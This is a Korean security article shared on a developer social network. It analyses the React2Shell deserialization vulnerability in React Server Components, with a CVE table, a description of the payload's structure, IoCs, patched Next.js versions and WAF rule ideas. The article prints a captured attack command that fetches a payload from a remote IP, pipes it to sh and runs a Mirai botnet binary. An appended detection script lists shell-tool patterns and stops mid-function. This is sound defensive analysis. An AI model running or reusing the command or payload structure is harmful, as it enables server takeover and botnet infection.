What is Hackers' Pub?

Hackers' Pub is a place for software engineers to share their knowledge and experience with each other. It's also an ActivityPub-enabled social network, so you can follow your favorite hackers in the fediverse and get their latest posts in your feed.


Since the iOS app update, other people's profiles pop up way too often, lol. Sometimes they show up even when I haven't touched anything. It's creepy.


์—ผ์‚ฐํ•˜ shared the below article:

React2Shell ์ทจ์•ฝ์ ์˜ ํŠน์„ฑ์„ ์•Œ์•„๋ณด์ž

๊ณ ๋‚จํ˜„ @gnh1201@hackers.pub

React2Shell ์ทจ์•ฝ์ ์ด๋ž€?

์™ธ๋ถ€์—์„œ ์ˆ˜์‹ ๋œ ํŠน์ •ํ•œ ๊ทœ๊ฒฉ์— ๋”ฐ๋ผ ๊ตฌ์กฐ์ ์œผ๋กœ ์ž‘์„ฑ๋œ ๋ฐ์ดํ„ฐ๋ฅผ ์ฒ˜๋ฆฌํ•œ๋‹ค๋ฉด, ๊ณต๊ฒฉ์ž๊ฐ€ ์–ด๋– ํ•œ ์˜๋„๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค๋ฉด ๋ฐ์ดํ„ฐ๋ฅผ ๋ณด๋‚ผ ๋•Œ ์‹คํ–‰ ๊ฐ€๋Šฅํ•œ ์•…์˜์  ์ฝ”๋“œ๋ฅผ ๊ฐ™์ด ๋„ฃ์–ด ๋ณด๋‚ผ ๊ฐ€๋Šฅ์„ฑ์„ ๋ฐฐ์ œํ•  ์ˆ˜ ์—†๋‹ค.

์ด๊ฒƒ์ด ๋ณด์•ˆ ์•ฝ์ ์ด ๋˜์ง€ ์•Š๊ธฐ ์œ„ํ•ด์„  ์ด๋Ÿฌํ•œ ๊ณต๊ฒฉ์ž์˜ ์˜๋„๋ฅผ ๋ง‰์•„์•ผํ•˜์ง€๋งŒ, React2Shell (CVE-2025-55182) ์ทจ์•ฝ์ ์€ ์ด๋Ÿฌํ•œ ๊ณต๊ฒฉ์ž์˜ ์˜๋„๋ฅผ ๋ง‰์ง€ ๋ชปํ•˜๊ณ  ์‹คํ–‰์„ ๋ฌด์ œํ•œ ํ—ˆ์šฉํ•˜๋Š” ๋ฐฉ๋ฒ•์ด ๋ฐœ๊ฒฌ๋œ ๊ฒƒ์ด๋‹ค.

ํŠน์ •ํ•œ ๊ทœ๊ฒฉ์— ๋”ฐ๋ผ ๊ตฌ์กฐ์ ์œผ๋กœ ์ž‘์„ฑ๋œ ๋ฐ์ดํ„ฐ๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ณผ์ •์„ ์ผ์ปซ๋Š” ์šฉ์–ด๋ฅผ "์—ญ์ง๋ ฌํ™”"(Deserialization)์ด๋ผ๊ณ  ํ•œ๋‹ค.

ํŠน์ •ํ•œ ๊ทœ๊ฒฉ์€ ์ž˜ ์•Œ๋ ค์ง„ JSON, XML, YAML๊ฐ€ ๋  ์ˆ˜๋„ ์žˆ๊ณ , ์ž์ฒด ๊ทœ๊ฒฉ์ด ๋  ์ˆ˜๋„ ์žˆ๊ณ , ํ˜ผํ•ฉํ˜•์ด ๋  ์ˆ˜๋„ ์žˆ๋‹ค. React2Shell ์ทจ์•ฝ์ ์€ ํ˜ผํ•ฉํ˜•(JSON + aka. Flight)์„ ์‚ฌ์šฉํ•˜์˜€๋‹ค.

์ž์ฒด ๊ทœ๊ฒฉ(aka. Flight)์ด JavaScript๋กœ ์ •์˜๋œ ๊ฐ์ฒด์˜ ์„ฑ๊ฒฉ์„ ์ž„์˜๋กœ ๋ณ€๊ฒฝ(Prototype ๊ฐœ๋… ์ƒ ์กด์žฌํ•˜๋Š” ์ƒ์„ฑ์ž ์ˆ˜์ค€์˜ ์†์„ฑ(__proto__, constructor)์— ์ ‘๊ทผํ•˜์—ฌ ๊ฐ์ฒด์˜ ์„ฑ๊ฒฉ์„ ์ž„์˜๋กœ ๋ฐ”๊ฟ€ ์ˆ˜ ์žˆ์Œ)ํ•˜๋Š”๋ฐ ํ•„์š”ํ•œ ์ ‘๊ทผ์„ฑ์„ ๊ฐ€์ง€๊ณ  ์žˆ์—ˆ๊ธฐ์— ๊ฐ€๋Šฅํ•œ ๊ฒƒ์ด์—ˆ๋‹ค.

์—ญ์ง๋ ฌํ™”(Deserialization) ๊ณผ์ •์€ ์™œ ์œ„ํ—˜ํ•œ๊ฐ€?

์‹ค๋ฌด์ ์œผ๋กœ ์—ญ์ง๋ ฌํ™” ๊ณผ์ •์ด ์œ„ํ—˜ํ•ด์ง€๋Š” ์ด์œ ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

  1. ๋ฐ์ดํ„ฐ ๊ตํ™˜ ํฌ๋งท์€ ์ž๋ฃŒํ˜•์— ์—„๊ฒฉํ•˜์ง€ ์•Š๋‹ค: ์›ํ™œํ•œ ๋ฐ์ดํ„ฐ ๊ตํ™˜์ด ์ตœ์šฐ์„ ์ด๋ผ๋Š” ๋ชฉ์ ์— ๋งŒ์กฑํ•˜๊ธฐ ์œ„ํ•ด ์—„๊ฒฉํ•œ ์ž๋ฃŒํ˜•(Type-safe)์„ ์‚ฌ์šฉํ•˜๋„๋ก ์„ค๊ณ„ํ•˜์ง€ ์•Š๋Š”๋‹ค. ์ด๊ฒƒ์€ ์ž๋ฃŒํ˜• ํ˜ผ๋ž€(Type Confusion)์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•œ ๋‹ค์–‘ํ•œ ๋ฐฉ์‹์˜ ํƒˆ์˜ฅ ์‹œ๋„๋ฅผ ๊ฐ€๋Šฅ์ผ€ํ•ด์ฃผ๋Š” ๋‹จ์„œ๊ฐ€ ๋˜๊ธฐ๋„ ํ•œ๋‹ค.
  2. ํŠน์ • ๋‹จ์–ด ๋˜๋Š” ํŠน์ • ๊ธฐํ˜ธ๊ฐ€, ํŠน์ • ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•˜๋Š” ์‹ ํ˜ธํƒ„(Trigger) ์—ญํ• ์„ ํ•œ๋‹ค: ํŠน์ • ํŠน์ • ๋‹จ์–ด ๋˜๋Š” ํŠน์ • ๊ธฐํ˜ธ์— ์˜ํ•ด ์ด‰๋ฐœ๋˜๋Š” ํŠน์ • ์ž‘์—…์˜ ์œ ํšจ์„ฑ ๊ฒ€์ฆ ์ ˆ์ฐจ๊ฐ€ ๋ฏธํกํ•˜๋ฉฐ ํ•ด๋‹น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜์˜ ๋ฒ”์œ„๋ฅผ ๋ฒ—์–ด๋‚˜ ์‹œ์Šคํ…œ์œผ๋กœ ๊ถŒํ•œ ์ƒ์Šน๊ณผ ๋ช…๋ น ์‹คํ–‰์„ ํ—ˆ์šฉํ•˜๋Š” ํ†ต๋กœ๊ฐ€ ๋œ๋‹ค. ์‹ค๋ฌด์ ์œผ๋กœ ๊ฐ€์žฅ ๋น„์ค‘์ด ๋†’์€ ์œ ํ˜•์ด๋‹ค.
  3. ๋ฏธ๋ฆฌ ์‹๋ณ„๋˜์ง€ ๋ชปํ•œ ์˜ˆ์•ฝ์–ด๊ฐ€ ์žˆ์„ ์ˆ˜ ์žˆ๋‹ค: ๋“œ๋ฌผ์ง€๋งŒ ํŠน์ • ์–ธ์–ด, ํŠน์ • ํ”„๋ ˆ์ž„์›Œํฌ, ํŠน์ • ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ, ๋˜๋Š” ํŠน์ • ํŽŒ์›จ์–ด ๋“ฑ ์—ฐ๊ด€๋œ ์˜์กด์„ฑ์—์„œ ๋ช…ํ™•ํ•˜๊ฒŒ ์‹๋ณ„๋˜์ง€ ๋ชปํ•œ ์˜ˆ์•ฝ์–ด(๋‹จ์–ด, ๊ธฐํ˜ธ)๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ตฌํ˜„์ด ์กด์žฌํ•  ๊ฐ€๋Šฅ์„ฑ๋„ ์žˆ๋‹ค. ์ด๋Š” ํŠน์ • ์กฐ๊ฑด์ด ๋งž์œผ๋ฉด ๋ฐœํ˜„๋  ๊ฐ€๋Šฅ์„ฑ์ด ์žˆ๋‹ค.

์ด ์™ธ์—๋„ ์—ญ์ง๋ ฌํ™” ๊ณผ์ •์€ ์œ ์‚ฌํ•œ ์—ฌ๋Ÿฌ ์ทจ์•ฝ ๊ฐ€๋Šฅ์„ฑ์„ ๊ฐ€์ง€๊ณ  ์žˆ๊ธฐ ๋•Œ๋ฌธ์—, ์—ญ์ง๋ ฌํ™” ๊ณผ์ •์„ ๋ณดํ˜ธํ•˜๊ธฐ ์œ„ํ•œ ์—ฌ๋Ÿฌ ๋ณด์™„ ์žฅ์น˜์˜ ๊ตฌํ˜„์ด ํ•„์š”ํ•˜๋‹ค.

์•Œ๋ ค์ง„ ์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์  ์‚ฌ๋ก€ (์–ธ์–ด ๋ฐ ์ƒํƒœ๊ณ„๋ณ„)

์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์ ์ด ์–ด๋–ค ์„ฑ๊ฒฉ์„ ๊ฐ€์ง€๋Š” ์ทจ์•ฝ์ ์ธ์ง€ ๋น ๋ฅด๊ฒŒ ์ดํ•ดํ•˜๊ธฐ ์œ„ํ•ด์„ , ์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์ ๊ณผ ์—ฐ๊ด€์ด ์žˆ๋Š” ์ทจ์•ฝ์  ์‚ฌ๋ก€์™€ ๊ณตํ†ต์ ์ธ ํŠน์ง•์„ ์‚ดํŽด๋ณผ ์ˆ˜ ์žˆ๋‹ค. ๊ทธ ์‚ฌ๋ก€๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

์–ธ์–ด / ์ƒํƒœ๊ณ„์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์  ์‚ฌ๋ก€์ฃผ์š” ๊ณตํ†ต์ 
JavaCVE-2021-44228 (Log4Shell), CVE-2017-9805 (Apache Struts2 REST), CVE-2020-8840 (jackson-databind)์™ธ๋ถ€ ์ž…๋ ฅ์ด ๊ฐ์ฒด ์ƒ์„ฑยท์—ญ์ง๋ ฌํ™” ๊ฒฝ๋กœ(JNDI, XML/JSON ๋ฐ”์ธ๋”ฉ) ๋กœ ์œ ์ž…๋˜์–ด gadget chain ๋˜๋Š” ์›๊ฒฉ ํด๋ž˜์Šค ๋กœ๋”ฉ์„ ํ†ตํ•ด RCE ๋ฐœ์ƒ
.NET (C# / VB.NET)CVE-2019-18935 (Telerik UI), CVE-2025-53690 (Sitecore ViewState), CVE-2020-25258 (Hyland OnBase)BinaryFormatterยทViewState ๋“ฑ ๋ ˆ๊ฑฐ์‹œ ์—ญ์ง๋ ฌํ™” ํฌ๋งท์„ ์‹ ๋ขฐํ•˜์—ฌ ์ž„์˜ ํƒ€์ž… ๋กœ๋”ฉยท์ฝ”๋“œ ์‹คํ–‰
PythonCVE-2017-18342 (PyYAML unsafe load), CVE-2024-9701 (Kedro ShelveStore), CVE-2024-5998 (LangChain FAISS)pickleยทunsafe YAML ๋กœ๋” ์‚ฌ์šฉ์œผ๋กœ ์—ญ์ง๋ ฌํ™” ์ž์ฒด๊ฐ€ ์‹คํ–‰ ํŠธ๋ฆฌ๊ฑฐ
PHP (WP)CVE-2023-6933 (Better Search Replace), CVE-2025-0724 (ProfileGrid), CVE-2024-5488 (SEOPress)unserialize() / maybe_unserialize()์— ์‚ฌ์šฉ์ž ์ž…๋ ฅ์ด ์ „๋‹ฌ๋˜์–ด PHP Object Injection(POP chain) ๋ฐœ์ƒ
RubyCVE-2013-0156 (Rails YAML.load), CVE-2020-10663 (RubyGems Marshal)YAML.loadยทMarshal.load ์‚ฌ์šฉ ์‹œ ์ž„์˜ ๊ฐ์ฒด ์ƒ์„ฑ โ†’ ์ฝ”๋“œ ์‹คํ–‰
JavaScript / Node.jsCVE-2025-55182 (React2Shell), CVE-2020-7660 (serialize-javascript)๊ตฌ์กฐ ๋ณต์›ยท๊ฐ์ฒด ์žฌ๊ตฌ์„ฑ ๋กœ์ง์ด ์‹ ๋ขฐ๋˜์ง€ ์•Š์€ ์ž…๋ ฅ์„ ์ฝ”๋“œ/๊ฐ์ฒด๋กœ ํ•ด์„
GoCVE-2022-28948 (go-yaml Unmarshal), CVE-2020-16845 (HashiCorp Consul)Unmarshal ๋‹จ๊ณ„์—์„œ ์ž…๋ ฅ ๊ฒ€์ฆ ๋ถ€์กฑ โ†’ ๊ตฌ์กฐ์ฒด ๋ณต์› ๊ธฐ๋ฐ˜ ๋กœ์ง ๋ถ•๊ดดยทDoS
RustGHSA-w428-f65r-h4q2 (serde_yaml / unsafe deserialization, CVE-2021-45687)๋ฉ”๋ชจ๋ฆฌ ์•ˆ์ „๊ณผ ๋ฌด๊ด€ํ•˜๊ฒŒ serde ๊ธฐ๋ฐ˜ ์—ญ์ง๋ ฌํ™”์—์„œ ์‹ ๋ขฐ๋˜์ง€ ์•Š์€ ๋ฐ์ดํ„ฐ๊ฐ€ ๋‚ด๋ถ€ ํƒ€์ž…์œผ๋กœ ๋ณต์›๋˜์–ด ๋กœ์ง ์˜ค์—ผยทDoSยท์ž ์žฌ์  ์ฝ”๋“œ ์‹คํ–‰ ์œ„ํ—˜
Kotlin / AndroidCVE-2024-43080 (Android) / CVE-2024-10382 (Android Car)Intent/Bundle/IPC ์—ญ์ง๋ ฌํ™” ์‹œ ํƒ€์ž…ยท๊ฒ€์ฆ ๋ฏธํก โ†’ ๊ถŒํ•œ ์ƒ์ŠนยทDoS
C / C++CVE-2024-8375 (Google Reverb, Related to gRPC and protobuf)Unpack ๊ณผ์ •์—์„œ ๋ฐ์ดํ„ฐํƒ€์ž…(VARIANT), vtable ํฌ์ธํ„ฐ ์˜ค์—ผ ๋“ฑ ๋ฌด๊ฒฐ์„ฑ ๊ฒ€์ฆ ๋ถ€์กฑ
Swift / iOSCVE-2021-32742 (Vapor)์™ธ๋ถ€ ์ž…๋ ฅ์„ ๋””์ฝ”๋”ฉ/๊ฐ์ฒด ๋ณต์› ์‹œ ์‹ ๋ขฐ ๊ฒฝ๊ณ„ ๋ถ•๊ดด โ†’ DoSยท์ •๋ณด ๋…ธ์ถœ
์‚ฐ์—…์šฉ (ICS/OT)CVE-2024-12703, CVE-2023-27978 (Schneider Electric), CVE-2025-2566 (Kaleris Navis N4), CVE-2023-32737 (Siemens SIMATIC)ํ”„๋กœ์ ํŠธ ํŒŒ์ผยท๊ด€๋ฆฌ ์„œ๋ฒ„ ์ž…๋ ฅ์„ ์‹ ๋ขฐ๋œ ๋‚ด๋ถ€ ๋ฐ์ดํ„ฐ๋กœ ๊ฐ€์ •ํ•˜๊ณ  ์—ญ์ง๋ ฌํ™” โ†’ RCE ๋ฐ ๋ฌผ๋ฆฌ ์‹œ์Šคํ…œ ์˜ํ–ฅ ๊ฐ€๋Šฅ

์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์ ์€ ์–ธ์–ด์™€ ํ™˜๊ฒฝ์„ ๊ฐ€๋ฆฌ์ง€ ์•Š๊ณ  ๋‹ค์–‘ํ•˜๊ฒŒ ๋‚˜ํƒ€๋‚˜๊ณ  ์žˆ์œผ๋ฉฐ, ๋ฐœ๊ฒฌ๋œ ์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์ ์€ ์ทจ์•ฝ์  ์ ์ˆ˜(CVSS 3.x)์—์„œ๋„ 8.0์—์„œ 10.0 ๋ฒ”์œ„์˜ ๋งค์šฐ ๋†’์€ ์ ์ˆ˜๋ฅผ ๋ฐ›๊ณ  ์žˆ๋‹ค.

์ด์ œ ์‚ฌ์ „ ์ •๋ณด ์—†์ด๋„ ๊ณต๊ฒฉ ํŠน์„ฑ์„ ์ฝ์„ ์ˆ˜ ์žˆ๋‹ค.

์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์ ์ด ์–ด๋–ค ๊ณตํ†ต์ ์ธ ํŠน์„ฑ์„ ๊ฐ€์ง€๋Š”์ง€ ์„ค๋ช…ํ–ˆ์œผ๋‹ˆ, ์ด์ œ React2Shell ๊ณต๊ฒฉ์˜ ๊ฐœ๋…์ฆ๋ช…(PoC)์—์„œ ๋ณด์ธ ๊ณต๊ฒฉ ํŠน์„ฑ์„ ์‚ฌ์ „ ์ •๋ณด(๊ณต๊ฒฉ ๋Œ€์ƒ์ธ RSC์˜ ๋‚ด๋ถ€ ์ดํ•ด)๊ฐ€ ์—†์ด๋„ ์–ด๋А์ •๋„ ํŒŒ์•…ํ•  ์ˆ˜ ์žˆ๋‹ค.

์—ฌ๊ธฐ ๊ฐ๊ฐ JavaScript์™€ Python์œผ๋กœ ์ž‘์„ฑ๋œ ์ฃผ์š” ๊ณต๊ฒฉ ๊ฐœ๋…์ฆ๋ช… ์ฝ”๋“œ๊ฐ€ ์žˆ๋‹ค.

  • https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc/blob/main/01-submitted-poc.js
  • https://github.com/msanft/CVE-2025-55182/blob/main/poc.py

์—ฌ๊ธฐ์„œ ์•Œ ์ˆ˜ ์žˆ๋Š” ์ •๋ณด๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

  1. ์ž˜ ์•Œ๋ ค์ง„ ํฌ๋งท(JSON ๋“ฑ)๊ณผ ํ•จ๊ป˜ ๋ณด์ด๋Š” Colon-sperated String๊ณผ ๊ฐ™์€ ํŒจํ„ด์€ ํ™œ์šฉ ๋ถ„์•ผ์— ๋”ฐ๋ผ Micro-operations, Opcodes ๋“ฑ์˜ ์šฉ์–ด๋กœ ๋ถˆ๋ฆฌ๋ฉฐ, ๋น„์‹คํ–‰ ํฌ๋งท์„ ์ตœ์†Œ ๋ช…๋ น ์‹คํ–‰์ด ๊ฐ€๋Šฅํ•œ ํฌ๋งท์œผ๋กœ ํ™œ์šฉํ•˜๊ฒ ๋‹ค๋Š” ์˜๋„๋ฅผ ๋‚˜ํƒ€๋‚ธ๋‹ค. ๊ตฌํ˜„ ์‹œ ๋ฌด๊ฒฐ์„ฑ์— ์ฃผ์˜๋ฅผ ๋” ๊ธฐ์šธ์ด์ง€ ์•Š์œผ๋ฉด ์—ญ์ง๋ ฌํ™” ์ทจ์•ฝ์ ์„ ๋ถˆ๋Ÿฌ๋“ค์ด๋Š” ์ข‹์€ ๋ณต์„ ์ด ๋œ๋‹ค.
  2. ์ƒ์„ฑ์ž ์ˆ˜์ค€์˜ ํ‚ค์›Œ๋“œ (__proto__, constructor )๋ฅผ ํ†ตํ•ด Prototype์„ ๋ณ€์กฐํ•  ์ˆ˜ ์žˆ๋Š” ์ ‘๊ทผ์„ฑ์„ ๊ฐ€์ง€๊ณ  ์žˆ๋‹ค๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค. ์šฉ์–ด๋กœ๋Š” "JavaScript prototype pollution"๋ผ๊ณ  ํ•œ๋‹ค.
  3. then ํ‚ค์›Œ๋“œ๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ ๋Œ€์ƒ ๋‚ด๋ถ€์— ์กด์žฌํ•˜๋Š” Promise ๊ฐ์ฒด์— ๋ถ™๊ฒ ๋‹ค(๋˜๋Š” ์ƒˆ๋กœ์šด Promise ๊ฐ์ฒด๋ฅผ ๋งŒ๋“ค๊ฒ ๋‹ค)๋Š” ์˜๋„๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.
  4. ํŽ˜์ด๋กœ๋“œ์˜ value ํ•„๋“œ ๊ฐ’์ด ์•„์ง ์—ญ์ง๋ ฌํ™” ๋˜๊ธฐ ์ „์˜ ๋ฌธ์ž์—ด ํ˜•ํƒœ์˜ JSON์ธ ๊ฒƒ์œผ๋กœ ๋ดค์„ ๋•Œ, ๊ณต๊ฒฉ ๋Œ€์ƒ ๋‚ด๋ถ€์—์„œ JSON.parse ๋ฉ”์†Œ๋“œ์˜ ํ˜ธ์ถœ์„ ์˜ˆ์ƒํ•  ์ˆ˜ ์žˆ๋‹ค.
  5. ๊ณต๊ฒฉ ์ฝ”๋“œ๋กœ ๋ณด์ด๋Š” _response._prefix ์˜ ์ฃผ์ž…์€ then ํ‚ค์›Œ๋“œ๊ฐ€ ๋“ฑ์žฅํ•˜๋Š” ์œ„์น˜์™€ ์ตœ๋Œ€ํ•œ ๊ฐ€๊นŒ์šด ๊ณณ์—์„œ ์ผ์–ด๋‚˜์•ผ ํ•œ๋‹ค. ๊ทธ๋ž˜์•ผ Promise ๊ฐ์ฒด๊ฐ€ ๊ณต๊ฒฉ ์ฝ”๋“œ๋ฅผ ํŠธ๋ฆฌ๊ฑฐํ•  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์ด๋‹ค.
  6. ๊ฒฐ๊ตญ JSON ์—ญ์ง๋ ฌํ™” ๊ณผ์ •์ด ์ผ์–ด๋‚˜๋ฉด์„œ, then ์†์„ฑ์„ ๊ฐ€์ง€๋ฉด์„œ, ๊ณต๊ฒฉ ์ฝ”๋“œ๋ฅผ ์ˆ˜์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๊ฐ€์žฅ ์—ฐ๊ด€์„ฑ ๋†’์€ ํ‘œํ˜„์ด๋ผ๋Š” ์ ์„ ๋ชจ๋‘ ๋งŒ์กฑํ•˜๋Š” ๋ถ€๋ถ„์€ {"then": "$Bx"}๋ผ๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค. $Bx๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ๊ณผ์ • ์ค‘ (๋˜๋Š” $Bx๊ฐ€ ์ฒ˜๋ฆฌํ•œ ๊ฒฐ๊ณผ์— ๋Œ€ํ•œ ์‚ฌํ›„) ๊ฒ€์ฆ์ด ๋ถ€์กฑํ•˜๋‹ค๋Š” ์˜๋ฏธ์ด๋‹ค.
  7. ๊ณต๊ฒฉ ์ ˆ์ฐจ์— ํฌํ•จ๋˜๋Š” Next-Action ํ—ค๋”๋Š” ์• ์ดˆ์— ์ด ์ทจ์•ฝ์ ์˜ ์›์ธ์ด ๋œ ์–ด๋–ค ๊ธฐ๋Šฅ์„ ์ผœ๊ณ  ๋„๋Š” ๊ฒƒ์— ๊ด€ํ•œ ๊ฒƒ์ž„์„ ์˜ˆ์ƒํ•  ์ˆ˜ ์žˆ๋‹ค. ๊ฐœ๋ฐœ๋œ ์•ฑ์— ์กด์žฌํ•˜๋Š” ์œ ํšจํ•œ ์•ก์…˜์— ๋Œ€ํ•œ Key๋ฅผ ์•Œ ์ˆ˜ ์žˆ๋‹ค๋ฉด ๊ทธ ์•ก์…˜์˜ ์‹คํ–‰์„ ์š”์ฒญํ•จ์œผ๋กœ์„œ ๊ณต๊ฒฉ ์ฝ”๋“œ ๋˜ํ•œ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค.

๊ณต๊ฒฉ์ž๋Š” ์ด ์ทจ์•ฝ์ ์„ ์ด์šฉํ•ด์„œ ๋ญ˜ํ•˜๋‚˜?

Catswords OSS๋กœ ์ œ๋ณด๋œ ๋‚ด์šฉ์— ๋”ฐ๋ฅด๋ฉด, React2Shell์— ๋…ธ์ถœ๋œ ์„œ๋ฒ„๋Š” ์ด๋Ÿฐ ๋ช…๋ น์ด ๋“ค์–ด์˜จ๋‹ค๊ณ  ํ•œ๋‹ค. ํ•œ ํšŒ์›์ด ํ•™์Šต์šฉ์œผ๋กœ ๊ตฌ์ถ•ํ•œ React ์„œ๋ฒ„์—์„œ ๋ฐœ๊ฒฌ๋œ ๋กœ๊ทธ์ด๋‹ค.

(busybox wget -q http://193.34.213.150/nuts/bolts -O-|sh; \
 cd /dev; \
 busybox wget http://31.56.27.76/n2/x86; \
 chmod 777 x86; \
 ./x86 reactOnMynuts)

์ด ํŒŒ์ผ์˜ ์ •์ฒด๋Š” Mirai botnet์ด๋ผ ๋ถ€๋ฅด๋Š” ๊ณ„์—ด์˜ ์•…์„ฑ์ฝ”๋“œ์ด๋‹ค. React2Shell์— ์ทจ์•ฝํ•œ ์„œ๋ฒ„๋“ค์€ ์ด๋Ÿฐ ์•…์„ฑ์ฝ”๋“œ๋“ค์„ ์„œ๋ฒ„์— ์ฃผ์ž…๋ฐ›๊ฒŒ ๋œ๋‹ค.

๊ทธ๋Ÿผ ์ด ์•…์„ฑ์ฝ”๋“œ์˜ ๋ช…์„ฑ(?)์€ ์–ด๋А์ •๋„์ผ์ง€ ํ•œ๋ฒˆ ์ฒดํฌํ•ด๋ณด์ž.

  • https://www.virustotal.com/gui/file/858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (33/65 security vendors flagged this file as malicious)

(๊ทธ๋ž˜ ๋„ˆ ๋‚˜์œ๊ฑฐ ์•Œ์•˜์œผ๋‹ˆ ๊ทธ๋งŒ ์•Œ์•„๋ณด์ž)

๊ด€๋ จ IoC ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

  • 3ba4d5e0cf0557f03ee5a97a2de56511 (MD5)
  • 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb (SHA256)
  • http://193.34.213.150/nuts/bolts (URL)
  • http://31.56.27.76/n2/x86 (URL)

๋ฒ”์šฉ botnet์ด ์„ค์น˜๋˜๊ธฐ ๋•Œ๋ฌธ์— ์‚ฌ์‹ค์ƒ DDoS ๊ณต๊ฒฉ ๋“ฑ ๋‹ค์–‘ํ•œ ๋ชฉ์ ์œผ๋กœ ์•…์šฉ๋˜๋Š” ์„œ๋ฒ„๊ฐ€ ๋œ๋‹ค.

์ถ”๊ฐ€ ๋ถ„์„์€ ์•„๋ž˜ ๋งํฌ์—์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

  • https://www.mbsd.jp/research/20251211/react2shell/
  • https://www.bitdefender.com/en-us/blog/labs/cve-2025-55182-exploitation-hits-the-smart-home

์ด ๊ณต๊ฒฉ์„ ์–ด๋–ป๊ฒŒ ์™„ํ™”ํ•ด์•ผํ• ๊นŒ?

๋ฒ„์ „ ์—…๋ฐ์ดํŠธ๋กœ ํ•ด๊ฒฐํ•˜๊ธฐ

Next.js๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ์„œ๋ฒ„๋ผ๋ฉด ์ทจ์•ฝ์ ์ด ํ•ด๊ฒฐ๋œ ๋ฒ„์ „์œผ๋กœ ์—…๋ฐ์ดํŠธํ•˜์—ฌ์•ผ ํ•œ๋‹ค. Next.js์˜ ๊ฐœ๋ฐœ์‚ฌ Vercel์€ ์ทจ์•ฝํ•œ ๋ฒ„์ „์— ๋Œ€ํ•ด ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์•ˆ๋‚ดํ•˜๊ณ  ์žˆ๋‹ค.

Vulnerable version Patched release
Next.js 15.0.x 15.0.5
Next.js 15.1.x 15.1.9
Next.js 15.2.x 15.2.6
Next.js 15.3.x 15.3.6
Next.js 15.4.x 15.4.8
Next.js 15.5.x 15.5.7
Next.js 16.0.x 16.0.10
Next.js 14 canaries after 14.3.0-canary.76 Downgrade to 14.3.0-canary.76 (not vulnerable)
Next.js 15 canaries before 15.6.0-canary.58 15.6.0-canary.58
Next.js 16 canaries before 16.1.0-canary.12 16.1.0-canary.12 and after

ํ˜น์—ฌ ์—…๋ฐ์ดํŠธ์— ๊ณค๋ž€์„ ๊ฒช๊ณ  ์žˆ๋Š” ๊ฒฝ์šฐ, Vercel์—์„œ ๊ณต์‹ ์ œ๊ณตํ•˜๋Š” ํŒจ์น˜ ๋„๊ตฌ๋ฅผ ํ™œ์šฉํ•˜๋Š” ๊ฒƒ๋„ ์ข‹์€ ๋ฐฉ๋ฒ•์ด ๋  ์ˆ˜ ์žˆ๋‹ค.

  • https://github.com/vercel-labs/fix-react2shell-next

๋ฐฉํ™”๋ฒฝ(WAF ๋“ฑ) ๊ทœ์น™์˜ ๊ฐœ์„ ์œผ๋กœ ์™„ํ™”ํ•˜๊ธฐ

Next-Action ํ—ค๋” + ์‹œ์Šคํ…œ OS ๋ช…๋ น์–ด + ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ์˜ Array ๋˜๋Š” Object ๊ด€๋ จ ๋ฉ”์†Œ๋“œ, ์ด๋ ‡๊ฒŒ 3์š”์†Œ๊ฐ€ ๊ฐ™์€ ์š”์ฒญ์— ๋™์‹œ์— ๋“ค์–ด์žˆ๋Š”๊ฑด ํ”ํ•œ ์ƒํ™ฉ์€ ์•„๋‹ˆ๋ผ๋Š” ์ ์„ ๊ณ ๋ คํ•ด์„œ ์ฐจ๋‹จ ๊ทœ์น™์„ ๋งŒ๋“œ๋Š” ๊ฒƒ๋„ ๋ฐฉ๋ฒ•์ด ๋  ์ˆ˜ ์žˆ๋‹ค.
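As an added example of that three-signal rule (not code from the article, Vercel or any WAF product), here is a request scorer that counts how many of the three signals a request carries and blocks only when all three coincide. The token lists, the thresholds and the sample requests are constructed assumptions and would need tuning against real traffic; the point is the shape of the rule, in which any one signal on its own is normal.

```javascript
// Added example, not from the article or any WAF: three-signal request
// scoring. Token lists, thresholds and sample requests are constructed.

// Signal 2: fragments of OS command usage that have no business in form data.
const OS_COMMAND_TOKENS = [
  /\bbusybox\b/i, /\bwget\b/i, /\bcurl\b/i, /\bchmod\b/i,
  /\/bin\/(?:ba|da)?sh\b/, /\bnc\b\s+-/i, /\|\s*sh\b/,
];

// Signal 3: JavaScript Array/Object method names appearing as text in a body.
const JS_METHOD_TOKENS = [
  /\bObject\.(?:assign|defineProperty|defineProperties|setPrototypeOf|create|keys|entries|fromEntries)\b/,
  /\bArray\.(?:from|of|isArray)\b/,
  /\.(?:map|reduce|forEach|push|splice|concat)\s*\(/,
];

// req: { headers: { name: value }, body: string | object }
function classifyRequest(req) {
  const headers = {};
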